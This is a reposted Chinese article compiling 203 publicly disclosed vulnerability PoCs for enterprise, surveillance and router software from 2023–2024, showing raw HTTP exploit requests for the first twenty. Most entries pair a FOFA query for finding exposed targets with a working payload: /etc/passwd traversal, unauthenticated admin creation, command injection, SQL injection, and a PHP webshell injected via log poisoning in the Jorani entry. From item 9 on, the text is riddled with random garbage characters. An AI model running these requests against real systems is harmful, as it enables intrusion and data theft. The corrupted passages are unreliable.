Compilation of Publicly Disclosed Internet Vulnerabilities, 202309-202406
道一安全 2024-06-05 07:41 Beijing
The following article is sourced from 网络安全新视界; author: 网络安全新视界

Purpose: Exploitation of N-day vulnerabilities makes up a large share of attack activity in offensive and defensive security work; we hope this article is of some help to everyone's defence. Defenders can use its contents to carry out risk checks.

Vulnerability sources: This article covers 203 PoCs for high-impact vulnerabilities publicly disclosed in China and abroad between September 2023 and May 2024. All of them come from other public accounts or websites on the Internet and were compiled and published by the 网络安全新视界 team.

Security patches: All of the vulnerabilities are public; for patches or remediation plans, please contact the product vendor.

Content: Because of length limits, a few PoCs that are too long have been uniformly replaced with the word PAYLOAD; search for the complete PoC yourself if you need it.

Legal rights: If the content of this article infringes any party's legitimate rights, please contact the 网络安全新视界 team via the backend to have the relevant content removed.

Statement

To simplify the process and make browsing easier, there is no "reply to get the full list". This article is the most complete version available; when using it, press F12 and search for keywords.

Bookmark this article if you need it. You can also follow this public account (网络安全新视界).

Contents
01
1. StarRocks MPP database unauthorized access
2. Casdoor static arbitrary file read
3. EasyCVR Smart Edge Gateway userlist information disclosure
4. EasyCVR video management platform arbitrary user creation
5. NUUO NVR video storage management device remote command execution
6. Sangfor NGAF arbitrary file read
7. 鸿运 active safety monitoring cloud platform arbitrary file download
8. Phicomm router RCE
9. DocCMS (稻壳CMS) keyword unauthenticated SQL injection
10. Landray EIS Smart Collaboration Platform api.aspx arbitrary file upload
11. Landray EIS Smart Collaboration Platform doc_fileedit_word.aspx SQL injection
12. Jorani < 1.0.2 remote command execution
13. 红帆 iOffice ioFileDown arbitrary file read
14. 华夏ERP (jshERP) sensitive information disclosure
15. 华夏ERP (jshERP) getAllList information disclosure
16. 红帆 HFOffice 医微云 SQL injection
17. Dahua DSS itcBulletin SQL injection
18. Dahua DSS digital surveillance system user_edit.action information disclosure
19. Dahua DSS digital surveillance system attachment_clearTempFile.action SQL injection
20. Dahua ICC intelligent IoT integrated management platform arbitrary file read
21. Dahua ICC intelligent IoT integrated management platform random remote code execution
22. Dahua ICC intelligent IoT integrated management platform log4j remote code execution
23. Dahua ICC intelligent IoT integrated management platform fastjson remote code execution
24. Yonyou NC 6.5 accept.jsp arbitrary file upload
25. Yonyou NC registerServlet JNDI remote code execution
26. Yonyou NC linkVoucher SQL injection
27. Yonyou NC showcontent SQL injection
28. Yonyou NC grouptemplet arbitrary file upload
29. Yonyou NC down/bill SQL injection
30. Yonyou NC importPml SQL injection
31. Yonyou NC runStateServlet SQL injection
32. Yonyou NC complainbilldetail SQL injection
33. Yonyou NC downTax/download SQL injection
34. Yonyou NC warningDetailInfo interface SQL injection
35. Yonyou NC-Cloud importhttpscer arbitrary file upload
36. Yonyou NC-Cloud soapFormat XXE
37. Yonyou NC-Cloud IUpdateService XXE
38. Yonyou U8 Cloud smartweb2.RPC.d XXE
39. Yonyou U8 Cloud RegisterServlet SQL injection
40. Yonyou U8-Cloud XChangeServlet XXE
41. Yonyou U8 Cloud MeasureQueryByToolAction SQL injection
42. Yonyou GRP-U8 SmartUpload01 file upload
43. Yonyou GRP-U8 userInfoWeb SQL injection leading to RCE
44. Yonyou GRP-U8 bx_dj_check.jsp SQL injection
45. Yonyou GRP-U8 ufgovbank XXE
46. Yonyou GRP-U8 sqcxIndex.jsp SQL injection
47. Yonyou GRP A++Cloud government finance cloud arbitrary file read
48. Yonyou U8 CRM swfupload arbitrary file upload
49. Yonyou U8 CRM uploadfile.php interface arbitrary file upload
50. QDocs Smart School 6.4.1 filterRecords SQL injection
51. 云时空 social commerce ERP system validateLoginName SQL injection
52. Weaver E-Office json_common.php SQL injection
53. DPtech VPN Service arbitrary file upload
54. Chanjet T+ getstorewarehousebystore remote code execution
55. Chanjet T+ getdecallusers information disclosure
56. Chanjet T+ RRATableController, Ufida.T.DI.UIP.ashx deserialization RCE
57. Chanjet T+ keyEdit.aspx SQL injection
58. Chanjet T+ KeyInfoList.aspx SQL injection
59. XETUX software dynamiccontent.properties.xhtml remote code execution
60. 百卓 Smart management platform importexport.php SQL injection
61. 浙大恩特 customer resource management system fileupload arbitrary file upload
62. IP-guard WebServer remote command execution
63. IP-guard WebServer arbitrary file read
64. 捷诚 management information system CWSFinanceCommon SQL injection
65. 优卡特 脸爱云 "one face pass" smart management platform 1.0.55.0.0.1 authorization bypass
66. Wanhu ezOFFICE collaborative management platform SendFileCheckTemplateEdit SQL injection
67. Wanhu ezOFFICE wpsservlet arbitrary file upload
68. Wanhu ezOFFICE wf_printnum.jsp SQL injection
69. Wanhu ezOFFICE contract_gd.jsp SQL injection
70. Wanhu ezEIP success command execution
71. 邦永 PM2 project management system Global_UserLogin.aspx SQL injection
72. Seeyon OA getAjaxDataServlet XXE
73. GeoServer wms remote code execution
74. Seeyon M3-server 6_1sp1 deserialization RCE
75. Telesquare TLR-2005Ksh router admin.cgi RCE
76. Newcapec 掌上校园 service management platform service.action remote command execution
77. F22 apparel management software UploadHandler.ashx arbitrary file upload
78. pkpmbs construction quality supervision system FileUpload.ashx file upload
79. BYTEVALUE 百为 traffic-control router remote command execution
80. 速达天耀 software DesignReportSave.jsp interface arbitrary file upload
81. Uniview video surveillance main-cgi password disclosure
82. 思福迪 LOGBASE operations security management system test_qrcode_b remote command execution
83. JeecgBoot testConnection remote command execution
84. Jeecg-Boot JimuReport queryFieldBySql template injection
85. SysAid On-premise < 23.3.36 remote code execution
86. Japanese tosei self-service laundry machine RCE
87. DBAppSecurity 明御 security gateway aaa_local_web_preview file upload
88. DBAppSecurity 明御 security gateway aaa_portal_auth_config_reset remote command execution
89. 致远互联 FE collaborative office platform editflow_manager SQL injection
90. Hikvision IP network intercom broadcast system 3.0.3_20201113_RELEASE remote command execution
91. Hikvision integrated security management platform orgManage/v1/orgs/download arbitrary file read
92. Hikvision operations management center session command execution
93. QiAnXin 网神 SecGate 3600 firewall app_av_import_save arbitrary file upload
94. QiAnXin 网神 SecGate 3600 firewall obj_area_import_save arbitrary file upload
95. Apache OFBiz < 18.12.10 xmlrpc remote code execution
96. Apache OFBiz 18.12.11 groovy remote code execution
97. OneBlog v2.2.2 Shiro deserialization remote command execution
98. SpiderFlow crawler platform remote command execution
99. Ncast (盈可视) HD intelligent recording system busiFacade RCE
100. Likeshop 2.5.7.20210311 File.php userFormImage file upload
101. Ivanti Policy Secure 22.6 command injection
102. Ivanti Pulse Connect Secure VPN SSRF leading to remote code execution
103. Ivanti Pulse Connect Secure VPN XXE
104. Totolink T8 settings cstecgi.cgi getSysStatusCfg information disclosure
105. SpringBlade v3.2.0 export-user SQL injection
106. SpringBlade dict-biz/list SQL injection
107. SpringBlade tenant/list SQL injection
108. D-Tale 3.9.0 SSRF
109. Jenkins CLI arbitrary file read
110. GoAnywhere MFT unauthenticated administrator creation
111. WordPress Plugin HTML5 Video Player SQL injection
112. WordPress Plugin NotificationX SQL injection
113. WordPress Automatic plugin arbitrary file download and SSRF
114. WordPress MasterStudy LMS plugin SQL injection
115. WordPress Bricks Builder <= 1.9.6 RCE
116. WordPress js-support-ticket file upload
117. WordPress LayerSlider plugin SQL injection
118. 北京百绰智能 S210 management platform uploadfile.php arbitrary file upload
119. 北京百绰智能 S20 backend sysmanageajax.php SQL injection
120. 北京百绰智能 S40 management platform import web.php arbitrary file upload
121. 北京百绰智能 S42 management platform userattestation.php arbitrary file upload
122. 北京百绰智能 S200 management platform /importexport.php SQL injection
123. Atlassian Confluence template injection code execution
124. 湖南建研 engineering quality inspection system arbitrary file upload
125. ConnectWise ScreenConnect authentication bypass
126. aiohttp path traversal
127. Glodon Linkworks DataExchange.ashx XXE
128. Adobe ColdFusion deserialization
129. Adobe ColdFusion arbitrary file read
130. Laykefu customer service system arbitrary file upload
131. Mini-Tmall <= 20231017 SQL injection
132. JetBrains TeamCity 2023.11.3 and earlier authentication bypass
133. H5 云商城 file.php file upload
134. Netentsec NS-ASG application security gateway index.php SQL injection
135. Netentsec NS-ASG application security gateway list_ipAddressPolicy.php SQL injection
136. NextChat CORS SSRF
137. 福建科立迅 communications command and dispatch platform down_file.php SQL injection
138. 福建科立讯 communications command and dispatch platform pwd_update.php SQL injection
139. 福建科立讯 communications command and dispatch platform editemedia.php SQL injection
140. 福建科立讯 communications command and dispatch platform get_extension_yl.php SQL injection
141. 建科立讯 communications command and dispatch management platform ajax_users.php SQL injection
142. CMSV6 vehicle monitoring platform weak password
143. Netis WF2780 v2.1.40144 remote command execution
144. D-Link nas_sharing.cgi command injection
145. Palo Alto Networks PAN-OS GlobalProtect command injection
146. MajorDoMo thumb.php unauthenticated remote code execution
147. RaidenMAILD mail server v.4.9.4 path traversal
148. CrushFTP authentication bypass template injection
149. AJ-Report open-source data dashboard remote command execution
150. AJ-Report 1.4.0 authentication bypass and remote code execution
151. AJ-Report 1.4.1 pageList SQL injection
152. Progress Kemp LoadMaster remote command execution
153. Gradio arbitrary file read
154. 天维尔 fire rescue operations dispatch platform SQL injection
155. 六零导航页 file.php arbitrary file upload
156. TBK DVR-4104/DVR-4216 operating system command injection
157. 美特CRM upload.jsp arbitrary file upload
158. Mura CMS processAsyncObject SQL injection
159. 英飞达 medical image archiving and communication system WebJobUpload arbitrary file upload
160. Sonatype Nexus Repository 3 directory traversal and file read
161. 科拓 fully intelligent parking fee system Webservice.asmx arbitrary file upload
162. 和丰 multimedia information publishing system QH.aspx arbitrary file upload
163. 号卡极团 distribution management system ue_serve.php arbitrary file upload
164. 慧校园 (安校易) management system FileUpProductupdate.aspx arbitrary file upload
165. OrangeHRM 3.3.3 SQL injection
166. 中成科信 ticketing management platform SeatMapHandler SQL injection
167. 精益 value management system DownLoad.aspx arbitrary file read
168. Hongjing EHR OutputCode arbitrary file read
169. Hongjing EHR downlawbase SQL injection
170. Hongjing EHR DisplayExcelCustomReport arbitrary file read
171. 通天星 CMSV6 vehicle positioning monitoring platform SQL injection
172. DT HD license plate recognition camera arbitrary file read
173. Check Point security gateway arbitrary file read
174. Jinher OA C6 FileDownLoad.aspx arbitrary file read
175. Jinher OA C6 IncentivePlanFulfill.aspx SQL injection
176. Telecom gateway configuration management system rewrite.php file upload
177. H3C router sensitive information disclosure
178. H3C campus network self-service system flexfileupload arbitrary file upload
179. 建文 engineering management system arbitrary file read
180. 帮管客 CRM jiliyu SQL injection
181. 润申科技 enterprise standardization management system UpdataLogHandler.ashx SQL injection
182. 润申科技 enterprise standardization management system AddNewsHandler.ashx arbitrary user creation
183. 广州图创 library cluster management system updOpuserPw SQL injection
184. 迅饶科技 X2Modbus gateway AddUser arbitrary user creation
185. 瑞友天翼 application virtualization system SQL injection
186. F-logic DataCube3 SQL injection
187. Mura CMS processAsyncObject SQL injection
188. 叁体 佳会 video conferencing attachment arbitrary file read
189. 蓝网科技 clinical viewing system deleteStudy SQL injection
190. Short-video matrix marketing system poihuoqu arbitrary file read
191. ESAFENET (亿赛通) electronic document security management system NavigationAjax SQL injection
192. 富通天下 foreign trade ERP UploadEmailAttr arbitrary file upload
193. Hillstone 云鉴 security management system setsystemtimeaction command execution
194. 飞企互联 FE enterprise operations management platform uploadAttachmentServlet arbitrary file upload
195. 飞鱼星 internet behavior management system send_order.cgi command execution
196. 河南省风速科技 unified authentication platform password reset
197. 浙大恩特 customer resource management system Quotegask_editAction SQL injection
198. Aliyun Drive WebDAV command injection
199. Cockpit assetsmanager_upload interface file upload
200. SeaCMS (海洋影视管理系统) dmku SQL injection
201. Founder (方正) omni-media news editing system binary SQL injection
202. 微擎 AccountEdit arbitrary file upload
203. 红海云 EHR PtFjk file upload

PoC list

02

1. StarRocks MPP database unauthorized access
FOFA: title="StarRocks"
GET /mem_tracker HTTP/1.1
Host: URL

2. Casdoor static arbitrary file read
FOFA: title="Casdoor"
GET /static/../../../../../../../../../../../etc/passwd HTTP/1.1
Host: xx.xx.xx.xx:9999
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip

3. EasyCVR Smart Edge Gateway userlist information disclosure
FOFA: title="EasyCVR"
GET /api/v1/userlist?pageindex=0&pagesize=10 HTTP/1.1
Host: xx.xx.xx.xx

4. EasyCVR video management platform arbitrary user creation
FOFA: title="EasyCVR"
Change password to the MD5 of your own password
POST /api/v1/adduser HTTP/1.1
Host: your-ip
Content-Type: application/x-www-form-urlencoded; charset=UTF-8

name=admin888&username=admin888&password=0e7517141fb53f21ee439b355b5a1d0a&roleid=1

5. NUUO NVR video storage management device remote command execution
FOFA: title="Network Video Recorder Login"
GET /__debugging_center_utils___.php?log=;whoami HTTP/1.1
Host: xx.xx.xx.xx

6. Sangfor NGAF arbitrary file read
FOFA: title="SANGFOR | NGAF"
GET /svpn_html/loadfile.php?file=/etc/./passwd HTTP/1.1
Host:

7. 鸿运 active safety monitoring cloud platform arbitrary file download
FOFA: body="./open/webApi.html"
GET /808gps/MobileAction_downLoad.action?path=/WEB-INF/classes/config/jdbc.properties HTTP/1.1
Host:

8. Phicomm router RCE
FOFA: icon_hash="-1344736688"
After logging into the backend with the default account admin, perform the following operation
POST /cgi-bin/luci/;stok=bcd6ccd2fa5d212ce6431ca22f10b96d/admin/wifireboot HTTP/1.1
Host: x.x.x.x
Cookie: sysauth=<cookie obtained from the first-step login>
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryxbgjoytz
User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36

------WebKitFormBoundaryxbgjoytz
Content-Disposition: form-data; name="wifiRebootEnablestatus"

%s
------WebKitFormBoundaryxbgjoytz
Content-Disposition: form-data; name="wifiRebootrange"

12:00; id;
------WebKitFormBoundaryxbgjoytz
Content-Disposition: form-data; name="wifiRebootendrange"

%s:
------WebKitFormBoundaryxbgjoytz
Content-Disposition: form-data; name="cururl2"


------WebKitFormBoundaryxbgjoytz--

9. DocCMS (稻壳CMS) keyword unauthenticated SQL injection
FOFA: app="Doccms"
GET /search/index.php?keyword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
) n( G/ K0 Y) ~* aHost: x.x.x.x, M2 m8 P) E8 S6 u# x, {
* n0 M; S' G, I/ _+ b
# ]8 `" m2 b/ Y8 ~ u: `2 bpayload为下列语句的二次Url编码
$ W* D9 A# h `2 I; E+ m- g; V& v* x3 o% e; `9 ]4 [
' and (extractvalue(1,concat(0x7e,(select user()),0x7e)))#9 }( v- X# Q( N
8 d7 s* V1 v, q( p- o% Q# x
10. 蓝凌EIS智慧协同平台api.aspx任意文件上传3 P' }6 d9 m4 M! {. R( a' i; e
FOFA:icon_hash="953405444"
5 h# l: I0 i; t, {- x& a2 {
5 W: G _2 ^9 @文件上传后响应中包含上传文件的路径
% {3 n. d/ ^; _. h* rPOST /eis/service/api.aspx?action=saveImg HTTP/1.18 G) p$ t1 h) H0 M3 N; q2 \1 @
Host: x.x.x.x:xx
" A5 k' x0 s5 d0 {3 A i, n! eUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/100.0.4896.127 Safari/537.362 d% g/ Q* `! g' h" d) D: C( L; p
Content-Length: 1978 f) m) ^) U- ?% A5 i; w$ t
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
# t1 o5 `0 n- y4 f: V7 H! X; M$ XAccept-Encoding: gzip, deflate: r, Y( a/ J" I+ Q* E
Accept-Language: zh-CN,zh;q=0.98 y7 m# l( c/ ?
Connection: close
' F2 d) U& }. F3 D9 e( x% TContent-Type: multipart/form-data; boundary=----WebKitFormBoundaryxdgaqmqu
6 U2 `; h! ~( @. i( L4 Z$ }* n" a# }2 j/ r8 Q
------WebKitFormBoundaryxdgaqmqu
) a/ `, A) V3 @5 m1 wContent-Disposition: form-data; name="file"filename="icfitnya.txt"
+ [+ L1 L/ u# `9 D7 sContent-Type: text/html& X- N& \6 h5 R( _ E/ L) E* \
c% r6 ^6 {" a+ h! g* ]jmnqjfdsupxgfidopeixbgsxbf+ D6 l( y1 d% G: e. H8 X- N3 y" M
------WebKitFormBoundaryxdgaqmqu--
; F6 d8 {$ @6 G, t$ V8 P1 o6 i( |* d$ g% n# ~* X. l% y
' H8 e6 t% L' w6 q& J% |% L
11. 蓝凌EIS智慧协同平台 doc_fileedit_word.aspx SQL注入
% u$ D7 M( h0 q+ gFOFA:icon_hash="953405444" || app="Landray-EIS智慧协同平台"
7 N, G& K z3 H' ?7 @GET /dossier/doc_fileedit_word.aspx?recordid=1'%20and%201=@@version--+&edittype=1,1 HTTP/1.1# ~% O) k3 S5 [4 E6 T9 W9 [
Host: 127.0.0.1
$ ~0 z6 u- H6 TPragma: no-cache& v0 F2 \# G N, |" r8 _* x
Cache-Control: no-cache7 O1 F5 ]- T% F: ]+ Y6 \& ?7 G
Upgrade-Insecure-Requests: 1
7 @: C1 m R0 R; pUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.362 t2 a4 P" N' f% k
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.73 d9 }% ^! g- V
Accept-Encoding: gzip, deflate8 H6 [" {9 g& K) H9 R7 B( ~# D
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8: \: F4 }2 f; h5 N; V
Connection: close
! q& j+ x. ~4 ~7 p4 n9 f# v1 w, Z7 B5 w3 d i1 R* @5 E# @
4 }# _- B. L( i, V6 `1 Y3 p
12. Jorani < 1.0.2 远程命令执行6 H: F( Y' x, l# I) m- h9 t
FOFA:title="Jorani"# ?0 a6 n: T) P# b3 r
第一步先拿到cookie# k5 B! o9 @) y* _( K+ W/ i3 `
GET /session/login HTTP/1.1
3 Z4 b- `8 q+ X+ w1 LHost: 192.168.190.30
9 Y7 M2 N* Y0 q1 P6 Y: MUser-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2309.372 Safari/537.36
$ r" c% M+ r c. |1 e! MConnection: close
. J8 R+ v$ n! E6 r1 g, p8 @Accept-Encoding: gzip
\, y: M- U& {; m6 Z
$ x q% v: o5 N* A" Z# e9 O4 I. p5 ?2 g& I. }. g6 b* i
响应中csrf_cookie_jorani用于后续请求
1 e* ?2 P: t# m. V2 ZHTTP/1.1 200 OK
0 a) K( q: Y) r) x; j' xConnection: close
" ^0 j5 g2 c# QCache-Control: no-store, no-cache, must-revalidate
" G, i, \0 j5 Q3 vContent-Type: text/html; charset=UTF-8' [: v1 e) Q0 Y) H# `: ]3 q
Date: Tue, 24 Oct 2023 09:34:28 GMT$ e3 T7 e; K0 n b+ {5 i. B
Expires: Thu, 19 Nov 1981 08:52:00 GMT
3 ^0 o- O x- M/ W8 rLast-Modified: Tue, 24 Oct 2023 09:34:28 GMT
4 @) W( {, K# _ L2 {. A IPragma: no-cache) J( X; ]8 s9 W- h! K9 _
Server: Apache/2.4.54 (Debian)9 R% x- O( B. U# R8 O# [ W
Set-Cookie: csrf_cookie_jorani=6ca560f2b0baf3cda87c818a4a15dc77; expires=Tue, 24-Oct-2023 11:34:28 GMT; Max-Age=7200; path=/5 H# F' v# a, Y7 g# W
Set-Cookie: jorani_session=bqk0ttr6q2mg3tae6rd75ei02umkq99r; expires=Tue, 24-Oct-2023 11:34:28 GMT; Max-Age=7200; path=/; HttpOnly
0 z- I/ Y& S0 p* N H5 M& T# qVary: Accept-Encoding L( O2 [% x' k. g9 P' d
# I: k, F3 o |- k
# S1 w& e) [! e6 X4 C9 V
POST请求,执行函数并进行base64编码
3 K( B$ h2 \; L ?POST /session/login HTTP/1.1
3 o& c/ X. _" B. L# o. y% T7 DHost: 192.168.190.30
' z. Z5 H; x7 R5 l# ~7 NUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2866.71 Safari/537.36
: X& [4 m0 n' l8 m; s9 G. x; W: MConnection: close' U7 V2 B- K) ?+ F7 _
Content-Length: 252
5 [* k9 p# c# d7 \, q1 AContent-Type: application/x-www-form-urlencoded
$ Y* C+ S0 U" \Cookie: csrf_cookie_jorani=6ca560f2b0baf3cda87c818a4a15dc77; jorani_session=bqk0ttr6q2mg3tae6rd75ei02umkq99r
3 A4 d! _1 v/ P( |$ w4 AAccept-Encoding: gzip2 k9 P% R: [0 K' y2 m
5 u6 g/ d* o0 |- K( k4 w; }csrf_test_jorani=6ca560f2b0baf3cda87c818a4a15dc77&last_page=session%2Flogin&language=..%2F..%2Fapplication%2Flogs&login=<?php if(isset($_SERVER['HTTP_K1SYJPMHLU4Z'])){system(base64_decode($_SERVER['HTTP_K1SYJPMHLU4Z']));} ?>&CipheredValue=DummyPasswor
" k8 d( m/ k7 W. V0 ]) i
' {) T& e7 j p6 _( Q) n% @8 |: F$ f! k* d6 o6 c" y: p
* E/ B9 V& Y' Q' F6 c2 M向靶场发送如下请求,执行id命令,请求头中的ZWNobyAtLS0tLS0tLS07aWQgMj4mMTtlY2hvIC0tLS0tLS0tLTs=是命令base64编码后的字符串
$ N/ {: p8 }: P# Z( N0 q8 PGET /pages/view/log-2023-10-24 HTTP/1.13 e. z @5 u; i2 {5 T- s
Host: 192.168.190.30
" k+ O" V% i! h* C6 xUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36; Y7 y; {( @$ I! e0 k
Connection: close: W4 U# H# R. x( L1 ]: l5 A. J6 R
Cookie: csrf_cookie_jorani=6ca560f2b0baf3cda87c818a4a15dc77; jorani_session=bqk0ttr6q2mg3tae6rd75ei02umkq99r
" @2 C2 I# N0 OK1SYJPMHLU4Z: ZWNobyAtLS0tLS0tLS07aWQgMj4mMTtlY2hvIC0tLS0tLS0tLTs=
p/ E7 A. `5 I5 YX-REQUESTED-WITH: XMLHttpRequest
# f8 O9 K! d& a. O' K4 @. k8 _7 _Accept-Encoding: gzip
+ J/ y0 X) x0 k+ g- ^/ W. n+ l! t* a$ P! z- \% Z
1 f( u+ w; S1 f, r& v: o' n& y
13. 红帆iOffice ioFileDown任意文件读取3 z/ b- w. y$ L" G
FOFA:app="红帆-ioffice"
5 Q/ l2 p0 H" z7 w+ S% \1 K: ]GET /ioffice/prg/interface/ioFileDown.aspx?sFilePath=c:/windows/win.ini HTTP/1.11 u$ p5 o. i# B+ [( o% q
Host: x.x.x.x
4 P, W. x' s- p+ b2 o) ~8 cUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36
6 U4 V5 I$ Q/ c0 ~" QConnection: close: c' @& f6 l' y P. m
Accept: */*
9 L6 A! Y0 k, BAccept-Encoding: gzip
' T/ M1 T; s' z" w! r& t- O
. b" k! c# N3 c' s" _; s* U5 Z2 f+ d4 V# a" u# k
14. 华夏ERP(jshERP)敏感信息泄露) P2 j( t, e1 ?8 S9 n4 `# p
FOFA:body="jshERP-boot"+ w) X% v" A: q2 Z
泄露内容包括用户名密码
. V. S# P; p, U bGET /jshERP-boot/user/getAllList;.ico HTTP/1.1
' Y+ F# C" h& W) jHost: x.x.x.x. ]! D' k$ o+ Z" L7 X3 Y
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.47 Safari/537.36
# @4 v. y$ s- hConnection: close
- t$ O& c! ~& e* FAccept: */** P& o4 s$ b, T! t8 B2 ]. y& s. ~
Accept-Language: en
N# ^$ ?6 R( C" z4 b' `; H& wAccept-Encoding: gzip
- m. }0 e# a) M- N8 Z
/ F/ p4 {( M j( r$ N7 N, o$ J
, c4 B! o" g5 U) j. }15. 华夏ERP getAllList信息泄露
& c5 y, h* t- i; I! E: X! VCVE-2024-0490/ v( ~4 P3 w) j+ r) ~% s
FOFA:body="jshERP-boot"
1 F" h/ [% x( {6 z8 n8 ?: @+ e泄露内容包括用户名密码0 i4 d$ k, q3 y: J" m; ^
GET /jshERP-boot/user/a.ico/../getAllList HTTP/1.1, e. t- ]# O0 k* J
Host: 192.168.40.130:100
8 R2 `6 h6 O; ^User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.47 Safari/537.36
5 ^/ Y& B5 \$ D' s* wConnection: close
8 P0 Y# r; v W# s) {- HAccept: application/signed-exchange;v=b3;q=0.7,*/*;q=0.8
) Z- V* [5 c* T3 RAccept-Language: en h* t! m# d, X* \
sec-ch-ua-platform: Windows: ~7 K' c6 k Q* S
Accept-Encoding: gzip
8 Z$ s" y3 m' j. R$ ?) ~; B6 t6 A6 o5 q/ C# c a
" `7 t+ ?% A8 U' p" x' t: Y& f. S5 a16. 红帆HFOffice医微云SQL注入9 Z0 n) Q) A8 A: G7 K7 D) [# F" L
FOFA:title="HFOffice"
[5 i/ y1 b/ wpoc中调用函数计算1234的md5值
9 u, y% c& a; Z, g% h- z4 xGET /api/switch-value/list?sorts=%5B%7B%22Field%22:%221-CONVERT(VARCHAR(32),%20HASHBYTES(%27MD5%27,%20%271234%27),%202);%22%7D%5D&conditions=%5B%5D&_ZQA_ID=4dc296c6c69905a7 HTTP/1.13 @8 P3 _7 m8 s; r' e
Host: x.x.x.x
' ]# q' q2 ]5 c! ]" m7 j& X0 r9 FUser-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1866.237 Safari/537.365 X+ b+ M/ r. H% \% M
Connection: close
( [2 @2 i& _8 iAccept: */*
8 q- b @) K2 U; NAccept-Language: en8 d6 p3 I* J; a- M2 E
Accept-Encoding: gzip1 q7 o/ L# x4 ~: Z
; _; G/ M$ E. X' R2 u9 R6 B0 r6 C* L- H6 s- U* h$ B7 \
17. 大华 DSS itcBulletin SQL 注入' e! I+ {& t* B' ]. O
FOFA:app="dahua-DSS"5 s; T, m* X. F8 [% h; D
POST /portal/services/itcBulletin?wsdl HTTP/1.1' u5 M" o0 k4 O. [- Z, I
Host: x.x.x.x
" Q: W) J( f# ]; s! N2 w( ], }User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
( y' A6 H2 k; AConnection: close- F; k' L5 u) t) V
Content-Length: 345- s" g4 t' c# L$ Z6 U5 |2 ?* P
Accept-Encoding: gzip. [: A! ?. L N. c2 j% J
$ P( @1 c) S7 q& Q- z0 \" v
<s11:Envelope xmlns:s11='http://schemas.xmlsoap.org/soap/envelope/'> M7 v; \, h& I$ x
<s11:Body>
" b; M6 g( f5 c9 v <ns1:deleteBulletin xmlns:ns1='http://itcbulletinservice.webservice.dssc.dahua.com'># M. a$ Y: ~0 F; C) y! n
<netMarkings>. l! g" h! _/ C W& z5 p
(updatexml(1,concat(0x7e,md5(102103122),0x7e),1))) and (1=1
0 j( r5 z2 l0 ^' {% f4 @, k$ g </netMarkings>
% Z% j4 C+ ~- U; H- \/ ? </ns1:deleteBulletin>
' _9 h: U+ s# R; d5 A9 c </s11:Body>
0 T" ?* g- [( `8 e0 G" |: e</s11:Envelope># S! ?7 g5 c! b0 ?
$ w& r' X/ g" \% K# w; y( }& ^
) j3 s3 t, y" S& d5 E5 ^18. 大华 DSS 数字监控系统 user_edit.action 信息泄露1 {1 H1 [2 T' s" R6 H
FOFA:app="dahua-DSS"
) b1 a5 F; Y- E9 P# M0 JGET /admin/cascade_/user_edit.action?id=1 HTTP/1.18 q/ T( q( W* B. L7 v
Host: your-ip
0 k8 \1 J! A* ?$ u' AUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36# P$ T. |( k. c$ X- s! }
Accept-Encoding: gzip, deflate
& F. b4 l6 F4 F' H- c" tAccept: */*
: q* _# n% C: e# `9 E* qConnection: keep-alive, h7 s6 L5 e B9 u: N+ c( M
9 m" k& o6 M; K; W
( v' X. t r& k5 Q3 q1 N9 l
" A. Z/ D1 ~8 _8 F# V* l. Z19. 大华 DSS 数字监控系统 attachment_clearTempFile.action SQL注入
1 R$ V; @" D; eFOFA:app="dahua-DSS"3 h( C7 U5 Y! b& V' g4 J1 N0 i
GET /portal/attachment_clearTempFile.action?bean.RecId=1%27)%20AND%20EXTRACTVALUE(8841,CONCAT(0x7e,user(),0x7e))%20AND%20(%27mYhO%27=%27mYhO&bean.TabName=1 HTTP/1.1% C0 D! L( x* S( d9 F# r
Host:4 ?% u8 w# I+ A
User-Agent:Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36
% z% h+ ], ?+ F# j. k9 k: y6 ^* xAccept-Encoding: gzip, deflate
' s# p. c( V: K5 @# eAccept: */*( X: j! a4 `- o/ n0 A* Z
Connection: keep-alive
5 x$ I$ n4 [% t, g# ]" W0 q
8 \0 v; y8 A7 f9 B/ _) K# n' Q- X V2 z
20. 大华ICC智能物联综合管理平台任意文件读取
2 d4 B1 j' j0 F/ h) f; uFOFA:body="*客户端会小于800*"
. P4 E: H5 x" Q$ zGET /evo-apigw/evo-cirs/file/readPic?fileUrl=file:/etc/passwd HTTP/1.1: N; i# m% r( ?
Host: x.x.x.x
